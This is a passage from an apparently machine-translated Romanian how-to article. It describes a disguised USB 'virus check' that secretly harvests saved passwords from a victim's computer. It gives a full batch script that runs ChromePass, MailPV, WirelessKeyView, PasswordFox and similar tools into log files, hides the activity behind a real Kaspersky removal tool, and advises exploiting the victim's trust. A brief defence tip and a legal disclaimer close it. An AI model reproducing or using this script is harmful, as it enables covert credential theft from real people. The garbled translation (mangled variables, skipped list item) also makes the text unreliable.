Aici acțiunea este un buton care va fi afișat în fereastra de selectare a acțiunii când conectați o unitate flash și Deschideți este o comandă pe care doriți să o efectuați când este selectată această acțiune. Această comandă include lansarea nick-ului BAT într-un mod ascuns utilizând utilitarul de pornire ascunsă.

4. Creați o lansare Batnick.bat:

echo off.
eCHO% CompuneternAme% \\% Nume de utilizator% BTE %% TIMP% \u003e\u003e PROG / LOG / _LOG.TXT
sTART PROG / ChromePass.exe / Stext PROG / Log /% compunetorAme% _chrom.txt
sTART PROG / DIALUPASS.EXE / STEXT PROG / LOG /% CompunetorAme% _dialUpass.txt
sTART PROG / IEPV.EXE / STEXT PROG / LOG /% compunetorAme% _iecvv.txt
start Prog / MailPv.exe / Stext PROG / Log /% compunetorAme% _mailpv.txt
sTART PROG / MSPASS.EXE / STEXT PROG / LOG /% CompunetorAme% _msspass.txt
start Prog / Netpass.exe / Stext PROG / Log /% compunetorAme% _netPass.txt
sTART PROG / PSPV.exe / Stext PROG / LOG / CompuneternAme% _spv.txt
sTART PROG / PSTPASSWORD.EXE / STEXT PROG / LOG /% ComputerternAme% _PSTPASSWORD.TXT
porniți prog / wirelessKeview.exe / Stext PROG / jurnal / log /% compunetorAme% _wirelesskeyview.txt

Dacă nu există "% ProgramFiles% \\ Mozilla Firefox \\" Goto Sfârșit
sTART PROG / PASSWORDFOX.exe / Stext PROG / LOG / LOG /% CompuneternAme% _passwordfox.txt
: Sfârșit.
Începeți prog / kk.exe

Luați în considerare echipa Batnik în detaliu:

echo off - interzicerea ieșirii în fereastra de execuție CMD

eCHO% CompuneternAme% \\% Nume de utilizator% BTE %% TIMP% \u003e\u003e PROG / LOG / _LOG.TXT - la fișierul PROG / LOG / _LOG.TXT Numele computerului, numele de utilizator, data și ora

sTART PROG / ChromePass.exe / Stext PROG / Log / ComputernAme% _Chrom.txt - Rulați utilitarul Chrompass.exe, care ar trebui să salveze parolele la fișierul PROG / LOG / Object_chrom.txt_name_chrom.txt

În mod similar, pentru celelalte utilități. Singura notă este înainte de lansarea paroleiFox.exe Verificați dacă FF este instalat în general pe computerul victimei. Doar dacă FF nu este instalat, atunci utilitarul paroleiFox.exe emite un mesaj de eroare.

porniți prog / kk.exe - ne ascundem acțiunile dvs. prin lansarea unui utilitar real pentru îndepărtarea viermei Net-Worm.win32.kido de la Kaspersky Lab

Toate - Flashka este gata. Acum, atacatorul este suficient doar pentru a conecta o unitate flash la computerul victimei și pentru a selecta "Verificați comportați virușii" care apare, pentru a scoate toate parolele salvate de pe acest computer. Justificarea necesității de a lansa "verificarea virușilor" este suficient de simplă, mai ales dacă victima te încredează.

Cum să se ocupe?

1. Nu salvați parolele - este mai bine să utilizați un anumit program de tip Passwalet sau Ewallet.

3. Disponibilitatea unui antivirus normal în mod necesar! Deși va merge covoare doar la mai multe dintre aceste utilități.

Motivul pentru scrierea acestui articol a fost o notă în revista "Hacker".

Acest articol este scris numai în scopuri informaționale.
Scopul său este protecția datelor dvs. de la atacator.
Cine este conștient, este înarmat!

Furtul altor parole implică răspunderea penală în partea 1 a art. 272 din Codul penal "Accesul neautorizat la informațiile informatice" și amenință realin inchisoare!